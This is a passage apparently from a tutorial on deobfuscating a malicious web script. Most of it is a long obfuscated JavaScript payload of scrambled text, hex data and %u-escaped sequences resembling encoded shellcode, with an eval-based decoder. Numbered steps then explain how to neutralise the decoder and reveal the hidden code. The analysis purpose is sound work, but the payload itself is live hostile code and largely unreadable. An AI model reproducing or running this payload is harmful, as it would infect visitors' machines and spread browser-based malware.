79u%3c00u%8a24u%e602u%`%F6D7u'u%E226uku%D209Il`ux{(l.B`a`n.aha;tnM,u`ette0.g{xuflirwgo.asepF`UUzvRnn`fbXF;tc{2as`0>.,ww(d`2o=cplFtcFn`gyineheerimesd[(gargr;af;oc`leyn~As;iN)e2tlynosr`t`;;|szweao3Ht.naeyticr;;t.ruu`;nf;rzcIErz`rirei!ci`}2mU`e``0)rl}PBfBCnf~n{e{()o+t(tsce;p(eyfev?```~ph`wo`yi~o<Iehs2+slt;(ei<`~p;tclb0`i4uaa;e)cvcd'i5Dt'cE);rrji4Dh+ekg/uyTrcycc){tkQ}o`..s(|{c}}Pc`r.`0nn`/({+omaaolidshuIdee'y;er=A=/t'}vcjbti5-rtXrtipdto/6enp=e,tytA`cr:i•/2focEarE`DCn{tOi892etOde.iipntemhbnua`;A<0dp'cra'idxBwmpkh5evmI=tercvte`;rlC6`br`Lo.'?n]Sni2D37'06361m0301FF579820EB0FFBEBB56D9AC9E08B0C23D50B0C40850D7E80F0FE1C51D04D2372B06D8536FF01A4F4007D7F6C050E6EF238B6D1E3D0994E118F20F38BA=00000F00616E40356674756073616607070F00030080D30e0230250F50OFal(59'(00I(,es52a562252865366v)'eE23287465266326'd1'A64A53232824260Na82F50292828783B60,h'FF+09705A5B4A66}6ah2FeE2E425A2F6B3a(S}}Funt`tsgretdFfv[/,i;1pvnniPyf=Hvf<pf>)veQ0tMntevFai,=),W(9;p)(l/=0nA90o+5503050C3FFA6265900000B00C6368096F75723E3C696E5C6C426E667075646025047F00607471756A64710A1E0706050901020600000100306D6600000001020700ARItiOia7DOv=70u%0843u%10e8u%1c08u%2525u%ee20u%0000u%c823u%0550u%26a0u%8006u%4706u%9a10u%b0d0u%b060u%9860u%3008u%b7c4u%f0e7usu%C603;7u%E399d2u%F60ClenAtmoha0l(gmliyeyca`n=)ra{xf`vbnuesoftnlb.nrT=bXoton`(COMT}otv3ru1x`s`iivtv;t`2e2Fh2,cf)pnc`*``ozu`.et)`ri](}gu}tttlmp(FU.f`H;a5he.enigara}}|ie`snu2(yK(gmplo(bCtyzgnni`cu}gV.cNge=gnglf=azmi4`Jss(1;{gztjPuzY(`sssnss{n`ishPB`}Bsmpu,a`(0s`le>(d(tg%r`CwYc8`iluf)sl`u)twhkss`i+(nrtdn;r'u(`d-3h+tl.Pg`edBDe'=~`'mIMso{tk;ciTucnpQtt(`thef(a=`l=cuun2im`ceducd=y'(sEomtf.dnH'K'b.afareuAd60yeM`(o.orp/2)(o`'2c{)S{ty`ncb.`rrxreC'EDcv.Bd4-.{.Bomtopl.ineio))u(}So'=a`mal`n`prSepw=5c`ed`idClaox'r(aDB'jnvAvaM`t;(`nF722;3F327e00205AD721C134041DDC13091794C0B4884FD37530453E1038BEFA608B0505550C850F65D230F535A5FE9E06361BEF4FBC48AD63507971247536230911FA8'0000020256E6D1A6D70066364737F5112070001010F0041s20F0E6064'blse(,,Ws',Ns01aF9m68682A226276={528F+462773067603WaD8F306E2626252A51`=A7F00A56456
3696A'0e+50t02E5F5F58716i4me75s4B285E606765trH}}(mtAfeehir.((1a^A/fl]a=(tfDm`7Ob`9x'=)elU)TEcrXelbf0'|1Is,ve;se2nxgr50r`3510020EE0F4E8DAE06016F006561297174736A627839636C631975606475656075635813626673616C4215000B0D040B09011301000001006840105034414202014SSE.vBgs8-Ba'503u%b4c0u%0c04u%208cu%2800u%a050u%1005u%0124u%0f0cu%a800u%0055u%2745u%ef00u%383au%0a0fu%5f38u%0095u%45c4u%0626k7u%F21v46u%630+F6u%80Kcmclhacesx`4ta`s(mpttmc`{unvbu=oacnn.wuhlelv)oj`OMEfuopUUMoj;tia4`b)F4u1ddaha}of)((Fi``.u{ege=2=&wesomfa;=gn.0e]n}oihepe)lTzo<(tu6iafw(z`rirei`z`~`nt`a.Ft)peSn~aoh.V,tt`i4nt)npLe,;=`g.s``teuf)zoi~c)`t,UhIEnUwa(ttigiit`~pirjPiraipen`rs()imel`~esetu`1ifba~hzcru{ce0n;yh``pt-`+fc`e.tve)me+=84='>eir`oc:2Ci<~`++edLinciT}oviiatauorv(r(lu)p`ze`%.+u)=equndlu(0.,e+PceA'aotTaEdugturectt'-0{OL='nCdyeb.;)n';)hr;MJi`-dorp(.op`aTcCEhacJ`00lvcJceyntototnld;;nefHb`'rvxmlv'sjicDla''t(n(focaarLOoe0sB8`P`iSipiw)mfSk6026vA6133103F02DD4B506F850D4850663B24009405B8DE3C4D322CC7F2BEB5416E862E03D80804FBE44C455E48670083F3276FC38B8733A39A479A8AD535D14C22D7C100000000E7964644C627C6E6C147963160504000101F24F0a02104C066;jah(s00Iv)4`v'+m80eF6F242A77336=fE+2C'2122346A6A71ItE6B70825552A232E09tA5F'02F5757672E6;,st60h592E292F4A77f,es52a0554458666A3ae(cffe(tn(ttb'bp).r,c;)v.rp'(`F8()Wv(3o)9{ssI;i(tyOFal`,W|2Nv0a(vkn)o1tr=;yS0F02000481195091B000021026656E4065637123342A7471616F744C6C16636304447544627F6473656306051501080804190E2000010500D60F110D000F01020000H(Pw`Jhs04Jr%6017u%0400u%26e8u%0068u%150eu%0615u%00e0u%c059u%f628u%9005u%0404u%4676u%9000u%dab0u%d0c5u%6090u%006fu%2446u%468d06u%E3a626u%F0'346u%0T=p`lix`ae1=`hx+.)peihs.fie(oan`ib.c)v`n`ynea;tVfMoF`ntabXzvVeyor5vs;);b)ttl)l;tu{~n,s>4pnvo~o``````tfeig}=`gp,l.c;toict.{u3gr`3ht,suufae=gnglfse=A~o`crfua;t.k(Rglifn```=+(ch;~rEM`i`i)le(0i`l`{nSz)o;ih`UicNcyLrtraztzzhs`lzoIEseszt.cj`is{zu`lsM`isO9(2guIp)eeonnva(xe}.i<+rr`=)itdEi.aa;e)`~C8~>'mne=bt036g'_v``n(`otovicnemctrriSievyesn{en`nuul=.;0[qmtBtmb;sw)=Eunt)pcBMtHitekn`atet,6CvbH`S'rb{nrpq;s.s;(.}BAo{Jloihwaslot'l7F(rr
E=-0aarEunp/ayyn-tdyt}c)u(jhBaap>oa>rldroiv4>>itien`ss`ofbt,s6-+oedHepci[odW=22E2a2E2D6=04F05A80BB9B29E043A1D94B40050000E4B83C12DD4E4CC794C08878808585449B9B058068085102B5500CA613334F2B6642E61BBD55DE7001E2CB7DD03D'0000213007656F6D6564657861644E7604020003090F0901m2036D6069ses.'v',N=|79=)'eE23662628283127'd8'A64560253A76600Na82F50752E5A244820,h'FF+082E4E576068}4ah2FeE51285B27636(01aF9m2F272E242364=,)aunn't)'A'u,o){G`]rl[=ssa'l((.()P.(1h;3SkeC}m)i{blse(1I(4`n'r'adg{p0ha0a[C900F0300061312E2601B064036E4C6D0E75646F606E4060717F636F6C6C6E637473445D5B647560736166001A0C0E070108190101000401000A006200D111A202000()EriEti-4E`u%0087u%001du%8913u%6e15u%20a0u%a5a8u%1c10u%4c5eu%a890u%00a0u%77c6u%403fu%0028u%d008u%05edu%2020u%00f8u%4416u%371797u%Dr8216u%0%A633u'Ist=osA:p`5`+*A=m;t.o.gpuf)0ibcfdep3{a~c~`g~l}oDuzvT=d`rOMotDmpn`6atw{vs`hh2{2eynr%e`.>)rcaf`f4+a0~~``mn]i`i)u`sp3eynstyxts2O`62i3`.tnur;=`g.s`i`=l`toaguvgtyqv)uelsu`c=:`+a4it)oG`cf~n{e{()o+t(tsce;uf`i~JsLe.RagyineheerimeewcN`teeyhtmszitesocialz~P0v4tnCe`a-d`capb2shfl`=ai0`{ni=ldarten;'c180';enp`j`2-Bh`Ma''t'=nrnematXekcosctnre{)ecv(e=gn0ensd;i;e(e#ed`ei{'Emtt;puyLkEstt'cpt'(r'50ajTph,e.s(ih.se/.sesc(Vnv-alnpipoo`e)s-Fu`eC`08ureCmtenbmp/t.(.rch{n)eermlj<wl<cggimce2<~d.dv`&esow(ju`iE4`sd)S`Nrn'vaF'7E76rF6F38'34F4113F4AD4449941BF2283F322003CC04B30C46D1803124BE2E08D817360304060C5040B5D00EBF7390D2E2D6934564B7DE376CF498837524F5607B054;8000001005E097E6931066461491F700A0900010102F3040e021E690C6vch9$=)1`=|,,={528F+976532865706WaBCF30276035637860`=A7F0032A2E282024'0e+50t02A262A28686i7me75s2F4424594867s'+m50e32B4560606B3fl;tn)tir;wt,t`d;tef+ov1lper)vl'p(&Dpl)z}1Hv{K}e;osjah((2Ns,9=)`%r1tn.0)y;sa;604F010104317605D00F01800C75646C6365632F396D197379667561616578726445634961406364737F511A17060307020A17000103010149DE4008000402020000);EidC=d24Cf5u%d30eu%1468u%5e13u%ee20u%0807u%e915u%2f27u%2fa0u%150du%1500u%0020u%0672u%0130u%0055u%1010u%0100u%0f0eu%c6c6u%0=4707u%`%F6D7u'u%E226;Mky`c.l`B?0~`2l`etynna)rn`{xde.u()r`ilR3`~t;.;trnotj=`bsMoEfrpe(d7lrhna
t+``.v;mpceuw4v`)otr`|```rxA`b1[e`f~n{saeu(mp(.G.dhh`((;,s2~N3cngi`i)le(z=`l+`fc,nk)h.Uu{n`e.n=o``0)r(sh;tb=o`sssnss{n`ishPB`}no<szo.EMpfd)pnc`*``ozu`+(Le1u`+.Yipiezh`tfozxee)`9a/Oci(+p1ehtrel0ceue0`ynx0haode=p`e.tvol7A~+dnea3`cBB~t+al~o.x``otXetrOCThlekrgsrs{{tasw`tecnuue`]}n'hunyitn}'Re(rdemI='ApoE)t`e)'icA4reT.e'as.'nps.B/S.)ha)A`ajm.d?npfr=E;i0E)oaT'40n`aTe(`pleejoboaya(Sc{cii`ulpSu/=.epaa-5/;,g)(f&(ibe'erod-4e)c;P=aodBit(62602`2562/401F0372FA04278E86628A95B7ABD9008335439A268CA88FF4E8EB7B7A67F8535565010C58404C3BEC5000FF6F38B23C38BC07B63046D07D175E438A7B24Ev200040010F5D766161666E4579766473070D00010A0F0009320961606D=t.'v=|69'(00'f9+28'272E295E6836ItC6B7066A63326A6109tA5F'0642A2855562;,st60h292445402B63f,es12a620292F56676v)'eE23284641667162di}cc{.fipit`e'y}rti)Ff]vlIs)fvkds&Fdv)ce)OgsTco'nves.'s,`v0,=)nu`)hos0;(ass}004F101010502704200026A10647C6F646E456F60646472694E6072717664646E6C754F65644E6C14796317010D0F1109010D070200070909A00F122342093202320;}Rt=T0=85Td39u%08b4u%ee90u%a05fu%a000u%9080u%5e2fu%664eu%f800u%200cu%e000u%0606u%589bu%b720u%20e8u%490au%b100u%fcd4u%f667u%s%2647usu%C603;7u%E39fEd(f,ml6a`0At`ltmh.e(t)oc(vb()pnM)o=f.e`+`h}seyecEfV`aeezvF)et.ni82(iulr`=:la}pett~f)a1;ti`a|S+2gfl+e6td=`ssthr{s(petmafViic~v``.~oH2.c,f~n{e{se=3o`b`h`cp{ifrNtnccxc`u(1;{ga.i}oc`u(ttigiit`~pirjPivtr`.nSKG~rXo{ege=2=&weso8~EM0r+8fboez`er~``dein-;=0r4P2g~`.3.Yi`(o0aan(xb`g2;elnom'peEi.abs-B`'otrr5=lFC`=`ru'bgpo=lrO.cobhi`)ITi(istFFirk`0hs0g;bli`vtbast)<Adw;Sn'ioned~`Plnl.i=E;ibl3F`cPCl'tttGd?eWo.aC`et;SJrapalidNte`lod0D;2t'c45cot'n'=ren`aoo)p`tuWtvtgdnegacep'sMtitf'ef`e.ee`)djrocnb=A4d;;}R`msorea)86366rF7C2i601F0C18C69EE24F24E1DCF9925F1008B8C3F49088B698E7EE34B0EFDFE6FF0C33532E8035686E301C050FE2562F78A49069776BEC002B032534E9DBEE947a00003E0006463656E0D4C747966426210070001040101522=02056E016n(S)e'|,,Ws',Wd9'A6406A252E68340Na82F50246F36677620,h'FF+0628252E2E25}4ah2Fe328282A60646(01aF9m5B75555F4667={528F+32A553469763anehtvcrb.dr0(0.fyV=,o=..ine;.=sfv((f>{nl&WpeIau,`nch9$v31n'0'{o0S;`pu0m
)s8sf001F00000080522952060C00017609736564656D3E6F63683F7C6263796E45056F46655F6C747861644E760D11081C0619010300010503030062020C0F0020020F00}}Se'``c05>a5c5u%b005u%8500u%09b3u%0029u%0c0eu%a0f8u%e0b8u%9010u%2f2fu%0005u%94f6u%9febu%8121u%3a5cu%30d1u%0001u%eef0u%9687uku%D200k7u%F21v46u%63u(3)u`ao5sh0Ah+oh`ifwma;tteoaM)rca;t``lqs`+`rumpMtF)D0r`IotT`Myvug9`nlm2(v``elrt.iu`u`l6}oosr`t`;;)l``~a)`(tth(gthat.aeru`snaoai~N)l(~p4``sssnsi``2csetet.`tsucdhiotd.fnc)`t)rns;tlfntraztzzhs`lzoIEsa``cnscFb)oY`vo~o``````tf`MG`0n`)uInce:`o`b1e-mg1}`%`;`(t%sn8lbobsc)ppcb8l=(1`as`cese=ldarji4Dh<cBHe4`a28w~'se`jelb``obQhljem({nin0oiaLLo`dAx*cct`se<=a.ove.;1toi}(tdbcdn(<o(a>eoo`lpdus-Cqt'rl)eryElinrd.vl{lc}MA`r.va=oa`rde.:0C}`e)lEFh`e)tO`u-t=vld;p{c)Fia`hga=.rr=agwoAnil`muetidve.'PCbt`j~E5c}}fA(eowi.){79682e6926;5A0F08CC7A454875E5F3A9C1C0C270E57BCC19FD7B01F349B85C02F00F695F50F8505081600D0BC286500FFF7C2FB338B140ED66F2B0C4BD175E8B3180F10r0000B50006667979606F64624E6461680407000003020D47'200796025e'h.rW(00Iv)6IaB8F306C2459223530`=A7F00A2864366870'0e+80t0232658212A5i5me75s29254A6A656Bs'+m50eE5E2F5F28267=fE+25'294449676361tkl(iarausti)''au{e//rlsmttIlj=k'=l''=Sfs&PgtMtt4F=t.'vn60=),Wvp8Cw<+b/e;s98d401F000610D3C480001106304736D766C556E21261976792A646C6A694C747E61696E5574627461491F70011A0E0005051901130001010A0040DE42111A476202100ec((jiwlD3<t05d6u%8870u%e000u%c823u%0550u%26a0u%0090u%0490u%0500u%f8f9u%0047u%1756u%dc5au%b1b0u%b06au%26fau%00beu%b407u%4630d2u%F60d06u%E3a626u%Fn);{nhxc5ee0Ai`ci=sufsn}oiniba;ott}of(eutl`+ebpefiT{r)g0nEfj*f.amiA=ue``na(0n2eynor+n+2);tnigara}}`osa;g{ntraia.h(ryzgmbn=.gclr+oH;e3)r`t(ttigiz=27ai`h~ap=h.nPTinlGVputo;ih;ge.eyzutyineheerimeewcN`r?(oePBuc;tS=af`f4+a0~~``>abb8`0/nC(x``&w+e6.1ut3vuui`+jOuhe)eInlhk{e`(l0o`2)ippsuntnde=p`edBDe/uyT(5's50i0Ph=+et'jn=lju``eceevtmg,norAAnq2r82a'h}tt2`rcdirat0twnf).iuuCt'bn)y~mnnde.'ti12`(,e.;OepTa=diy/eoHlh}BVu`cim2wmI'omcC0Bc=E;s-4(=E;.B'npt`akydeoh;(orwtem'sai'rofvc'oahbndEnd(di)oaj`ePc65.e}uYn.f`ds;t46F76=42E7v708C0F3149BB48D6D3BA0200290E
50BC043888C0504CFCE035FF5EF84F565F05FE0301926F448D0EB00F07F6926F02ED5BB3BD368CE4D7C3258334DDD8C61`0000F9000696067650561790F756A690B06000201DA0A07F20207650E6wSoGsIs',N=|4Nt46B704662E5A747109tA5F'020623466606;,st60h70285E2A452Ef,es12a459572864246v)'eE232F2A592A4021'dA'A6055957762B780a)seoremtehb;f)pnvrE;mvpa((nvo7p)=vy)8Hwe(DoTEc(0Ln(S)e=',=|1Ia`0=h==s2mf899a0F0F50600054976000021C007305636C657F616F2776607E426161683F6462616E456F552C6245797664730A1604070907190F20020104015F000F0B030720020340la)~'dis-5/a%5048u%d510u%1005u%0124u%0f0cu%a800u%0008u%6000u%6618u%15d5u%0746u%27ebu%00d0u%f835u%386eu%68d0u%0885u%d475u%560+F6u%832797u%Dr8216u%c{f}ceA`3`a)As2)s`.nug2;toadet}tih;tulneret`tst.Cojie{u~tF-V`Cfl,tB`m`==ulw)g`t.enn`c`(`ey(z`rirei!ci`}]teyinsrlitg.g)[ac`n`he`+l(ta2;o=atraztze=56tzfe;gr`ixcc`sgla(rn)uf`it,wKmpUn)pnc`*``ozu`+(Le1``vuwjPvl}oX`r`|```rxA`b1=xcl`tx8cis,=1````~l3mh8an7`i=mP0ew/nC`oe.b(=0o0cb,;`.rtmtbdom'poc:2Ci'mIM)5<sD-d~Aa~`cE);u``ei(=ckC)e(e(3=ntSS`q)r6)p)<vre7t`ryoDpr;r)du{cvtmh.fuc;:;ec`oms,ed19=''aAvbae'm1(t)/TsCe(c(A`-o`p`.en)celA-Aa`loi19u`lvcJatlo'-i.on.`})n`i=Megwmpsad'ic`nseecdlncecn`sse'dolD3slln(ait:ge}r7E602/7E73a5001A16A8E8938BDF60EA7332FAA9060106B8BA3EC83F70A175FEBF38F7E0FF07B63384BBF86506BF75F61F42E787DFC961E46139244730D474D34DEEC179t00001CB00C6C655E0E52737D64496975060200010002040'02005E004C`hceiNv)2`=|,`a82F9069232F263A70,h'FF+0966763D2234}2ah2FeA642E2920582(01aF9m2F245628776A={528F+6212F2B27607WaA5F302F4247606760.;e)n`aeet'upr;pcasSv=.lt'ltfi1g;6<o;0Ok`lF.i(h'0Ae'h.r=)0'|5Nr=8ui`nt`oo959t0A8B3FF00064F2700000C50266A6679657275644F636C64646171652A6179027D4365432001647966426215020F020701090702000300030D0B620A420B05020202'st;<>=di14b;u%0cbau%6000u%00e0u%c059u%f628u%9005u%00a0u%001cu%a515u%20b0u%4616u%26bcu%3601u%5a00u%9fb0u%5c00u%55ebu%c644u%17'346u%8=4707u%`%F6D7utvuetal?5=p;~.`{.nxcn)(eynb()h}oo.eynegsinh~utyUUnVfMtm;(T1DUUu2`sCd`(``m2i;t=ufw(`t2~(&mpae=gnglf=azmi`hwpnc.gesh-fO{tg.feteai)e6hu7}t`gyinehe``68iel`})ofsd.t=.`er)oc{no<sh`fFpeUc{ege=2=
&weso8~EM0ccanfIEkz;tqf`a|S+2gfl+e6`ilobh6).gh``00~sa;e8``)rec=+`p`0lf2giPclll~`xc0kl`f<naae('Ccexebt036g+edL;2'i5Dt'Rl''tl.}ln=cce`tOh{rcV1)==(HHM`;a0;e;zai`0ube'rapy`i;onvr'eeig'tl'ndnlMceep(:DE`m'tpajm`,p5)e;foePxea)S=Jm`.nn`t{unaF0'tde2d19)dearEpiuoadtacdl(};`vd'o=of`tamo`eet/hidtcee)d.d=`ec.css-5usec)vn'`enfy46D366A603r3A03A2468A33632022F8D91839DAE6E7C307B3CD24BEF0EE64EF86FEBF464FF5508C255E87500F63C4051EF7E730907B64DF9C92604B58D3A4A39AECE402Ch00005BF006D6C4F56636303426F7564170B0008003B0B20;2020F506D6Aokto`=|89'(09=E7F00B3A2A262576'0e+C0t058633820697i8me78s6B2926567E24s'+m50e626552065286=fA+25'2B482A064B61ItE6B7062F46786C760rL{{`pt'(A,t.adetrica(mic.v(=n0m})7c}0Wliv(pm)`Q0SwSoGs'|,W(1```%nl0or-rr9+5a000F6FF0F0DCBE86F1008F0E684E60697017786166796C646A63736E427376646D4E74407961624E6461660E1819010701090700000001DA0860DE0F00008102096;ec}";this[eval(document.getElementById('jlhoi2').value)](document.getElementsByTagName('textarea')[0].value);</script>

3. Keep the number that is inside the "document.write" instruction. It is 1177 in our example.
4. Delete the "document.write" instruction (marked red).
Quote
function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write('<p>1177</p>');var gwevh8=parseInt(izyqk.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var ipcncr='';for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){ipcncr=ipcncr+emgves.charAt(iwazgry);}}var ethmxz=ipcncr+"}MDAC();";var isaqbpx=btbnhm7(ethmxz);eval(isaqbpx);

5. Go to the next instruction. Replace the expression to the right of "=" with the number that you kept in step 3.

Your script should now look like this.
Quote
var emgves="db<Ptd10ov5u%00d8u%0008u%1c10u%4c5eu%a890u%00e8u%1c08u%2525u%ee20u%0500u%1616u%9008u%60c0u%d02du%3433u%6000u%75b5u%f617u%0%A633u%s%2647usu%C603ianmipl`)`Bt;v<tved.c{0mp(lM).;tnampcnttn`i`rr.bX(D`fhe}(j)rbXn`w`Di&nnd`;dwh`rufnuh`%n`per;=`g.s``teuf=i`egem.n.i6u`daepuwh~u`{a4it6}of)pnc`*`=6`)o`uOt;tu.VpT`ntcb;ttvtr`.i~uut.Jtvo~o``````tf`MG`0oortucNpUeylusr`t`;;)l``~1mzcyi8*ptes(0xVi`}n)si``se`+te+2lu`tgrkleo%n2k0;o0o`eyrn';hunpnj`2-Bh`n(`v8`d-3h`Ae`/>eivlu`tk)n(be}soe6)7=)11A=vy0v(w/rnn;`da)(te{ib}wcae)(nle)ti`ootiDunt)'B03ps)epre'='.';(viF((e)t;M`••hcoa=etmtsE0;com.:DD;omreCpmglpe'puCae}}Lit3v'd'nAm>cn'syx'g>i)mr;cte==(tl.)i14bevt{id)dMdu{742F28636D`000F0342ED085C94E7B6CE1B5E9C2038A48C54808B0BF4E8798FF67ECFC95F503260C03005C4FFB634558C6A603E177669383C316F02472D441D37581D78Ae00000A1011616364616A6F7465636E67070E00000002040v0240644E69ccwVn9=|,,Ws',tA9F'063252A70683;,st60h4F7768306373f,es12aA23232F2E292v)'eE2359594867606C'd6'A64A202A285B670Na82F902A45427B7460eOPPS`e)'t`esmoni`orr[ath'[lp()xe|1ve)Pkff'de;(U)H`hceiW|2Is,9muueexpi`y(5+]=00013133FF55C507F000C600F2D7C656241627F526061656969697364633341656B72456477690F756A69001A00050309010109010403000806000B0A4701020201L{hoo/dh:C0da20u%c1b8u%0015u%2f27u%2fa0u%150du%1c04u%208cu%2800u%a050u%9000u%f754u%0390u%0c00u%01b0u%3e1eu%0000u%f352u%4600u'u%E226uku%D200k7u%F29orcpoBom;(ahwa`hawVp`vxpeeea;aey(cpet`heg+san(fOMnr(CrnrnV)eOMc=i=Eg`uui&}th`~nnueni&ue0t.gi`i)le(0i`l`=sAo~oesgms)n=eg(rnfe)t=tu,s38;tu{ege=2==4|{n+sLh}onz(rlfehta}oia``cnsznvyzoiaf`f4+a0~~``>abb8uu`;nLe(UmpCnigara}}`osa;0uUkts84rOlis8ftzmig{hs+hcb0)hc=8cn-hte`cncue0.)}cxr3w)ttddimtld`cBB~t't'=a6+=84=+Md+>'mna;ln(T{e'jciinr);67;00K`a(0a'h2`gu`+yt;'anf+u}.tra;'tdt.ocsncBcAmtA;cD-6.x;Ol`c,`hc,sqali))c`c}B'••tonv=rre(sE0ohcec819}ce`aTleikpp;pmhu)cSOdh0imo>ace<ua`sp-`h<o{eH})ox``)`es`d10s{(ivge!ooFnv06F6675686t800222EA9FB5636A69E2902C9B9D9830D8B0F84EB835F3CFEE3F9853E818A3554E150FC84305F78338011C8636DF5ED741E050E3344F62C5A423F125DBE9Ds0000CE400057166666368406A7273
650107000304494F00a2070660616tkaa','(00Iv)0h'FF+0C7826287435}1ah2Fe02776366B616(01aF9m7A262A252A53={528F+E5E592766673WaE5F302129260E6A60`=E7F0082B4E646A78'pADDH=E;st0(eecdolni`^t(()0va'{pl|1cl&Dz(<dfo'eI;1AoktoI(2Nv0,en0s(1;nS=a<)='7005649EFF7FEA0E0040AD006E646C430C6E04637C657129756834746A6A7F650F140F5363077D644969760A140A0206190113000002003B210B620807D01202006OI`cddf=CF0yr50eu%c0b5u%1e2fu%664eu%f800u%200cu%26e8u%0068u%150eu%0615u%0006u%2417u%0f00u%6000u%b32du%0000u%0000u%ece5u%5702;7u%E399d2u%F60d06u%E3n`ttnacathsihltil`(r=obt.n`t}smpmot.i>)d``.v`0uMoueUUoteuD`MMo.`d`Fi0mmg`vhi<0`cnwes`~wxyN,f~n{e{()o+t(=.rf`fmute./c`l])ocu`;3`ht`.2,eynvo~o`````|t``hEi;tcg)ozuweog;tor?(oe.Vck.nSor`|```rxA`b1=xcl`nni`cEM~Jpefcz`rirei!ci`}2mU`e.`8oPlzi))aeuftte``Ya~;{ix`%oc`)Op=)gk0w0l{fk8(5f;(.iole('C=lFC`=o.s`r4`~C8~``_`';enrvle'i}wQekfots.}66}((Eur)-r%i)t(;i``eb#'do+tcsi`tgi.(EinkteuykCe(tpl99'Cmvbist'1tof..rel;;u{h}(h•stmei`nyn'iF0.`unlA-3}unnt'i-nilldeein{aWA`=0eoc<mcDejma=eswt/ndnTf{LO-e.'nu+:c0tr'oaax=cvrca3C79246E76h200038B60D2E81714CE8A22290AF61CD83652BCB5BC28BABDDEFFDFA83FB5310FB205F3B08707503CD54C27568643BDEF3CEF6EE69D102B5445D64E850F5Ca000006700C637C6974752569626075010507000007F7D00r020169056Eiwvr)0Ws',N=),e+80t029242976387i6me7Cs206724727B78s'+m80e3252529512E2=fA+25'2F2459762778It16B7062428282A7609tA9F'05A454F34783;lDFFO`lprr)'tbuCnvspf,c'f;].r'Sjs()rs&Fe(=o'u,)C}0ccwVnNs,`n'0me8cn0}gCns0{n480005508FFDF71489800161096F01636F6D4572356C4374736E2A646968406C6A604A5F687803426F756418030F070706090327010900003CDC604A0B000002020CAE(uyi10A-0>`1ed4u%97ebu%a0f8u%30b8u%9010u%2f2fu%8913u%6e15u%20a0u%a5a5u%00d4u%7637u%7328u%0001u%1177u%0c08u%000fu%3426u%56ev46u%630+F6u%833797u%D`siy(s`xheesi.hs;A)o`iaypa=heipessyno`{`l~vat,nzvmMbXw`tmr/fzvpft~~tx``i0a`l`~v.cfs.0`fF.H``sssnss{n`it`mr`|`[bhmn2.fe;;ttnOt20i3~N~`mpcaf`f4+a3|`hs~eAseytO;tynf`reeyn``vuwnn4pfscn`a|S+2gfl+e6`ilobtt`i4G~zot.kte=gnglf=azmi4`Jssh+;t`cez;`b`l`hhl~~bp)`hs)uud3s;Pa`;t`0`0ebi.0v0u})cvcdn';h`a28w~bgto`;'c180'npt+dne`a;
wQmt`uc'`nrisi)7c))Hn`;(`ul`u0f+t=Edd)Cr)eatogegdbgln`=y'mI((n't.a68)rlajc`(';tmaor`.e}}tJ(f)t•mp/'g'e`tOdA-l(mtaDB'emt`e)cs;tioonnlcntFD='''vu/eeomqel'=hi=o`otMuiof1di)gb`Df0rejnrtO-uiotrA64367E206e500B43FFB41AA34EEFC88E7A8EBB5E05BCC7000FF55A9F5980C8F79F3C8D9CC5F7EB073F1F4F53CC07084046E767F462E48EC20E4AB50CD4A1CAEAA2D0813m000009F174C696C62626E71756A64771202000000080063`2000C60796vaei;,Iv)4`={1st60h707628566668f,es12a369603375676v)'eE232A58262E7625'd6'A64A2A4E5A20730Na82F502328585A6360,h'FF+0F2847396365}aF((Wde.ci;hAomh`=(ti]h.is)js)Hves)be((.l9f)t4{K}(tkaa'`v89=),os0ao0n(.esxmo6000B6800FF1DA290160073006574716B696C746361636963734E491975256264646C475C647F7465636E680F090B070A0809000000060643106607D100352202006DPem>v``8A>~s%8800u%cbfeu%0090u%0490u%0500u%f8f8u%5e13u%ee20u%080au%e9fcu%0614u%378fu%c157u%00bau%b845u%105eu%00f0u%e5c4u%56a626u%F0'346u%2=4707u%Qho.me=Aia`.lli.}r;tfdb.wb=.lnt.g(.enttne,aih`cot,fOM`cu`e`Cotruh0;sF>>txr?ew`ap2ucvx+uFf`t(ttigiit`~phueaa|Sts)[e)putC}oicLh~;s2oH)~petr`|```r2|sri`dU.mpi(}oDcug~(mp(ccanfe~((uPB(sr`t`;;)l``~1mzcy``=+(b)nSyNDi;=`g.s``teuf)zoi~e`}o=o)ei!l+t(*rl``Ie;iY.;n0e(hr;ruwh+0e0nlns0a;n}{r'u(tddi's50i0jebbtvol7A~>aUa'otrvrt`uerAit)(`oouf`)a;;Eemvqn0e{`,o+u`lye;h`{(tangE.'ogeni'l>ed))torssC3;e2rea=')qp/lpete(cteAeu{tbb:t;aMt{.B`CAaee(s93;le(=E;acd'cycdtdh.c(F`3`>ijp=smbc=ls'od'blcBLnfw()cn`ts'2-0(t'``of1memi`213D246F3Cs0C4FDDEEB36B09B8A37BBA9A4DF08C66402803742F8D0117EF7BFD4EC10C8080536055C45F1F3C09F751047E206459CD6506F250FCADACE91304A70999BB9e000009006D68096D64636673616C4216080200010060300t02006D0765evFai1N=|59'i1ah2Fe364232F64276(01aF9m5A7F63637137={528F+02E24292E5A2WaE5F30282A4F607070`=A7F008432E2F2B67'0e+50t02543593C663fcL))Poms'bpetreiPP)=f+(')v;oe)Oh`v{l`l'pv3z;(0sTf)iwvr)1n7,=|1rc8pp0o0lw81ep50000E050FF6BB55000027000475437C4D7F6475297168367075697B736E716C32616D456563406A7273650C14050107010A170302040007D4200B0047000502020CFE)e<>hcA2<)ku%30c4u%eef5u%0008u%6000u%6618u%1590u%a05fu%a000u%9060u%5530u%56c7u%3427u%b00bu%28d0u%95e2u%2
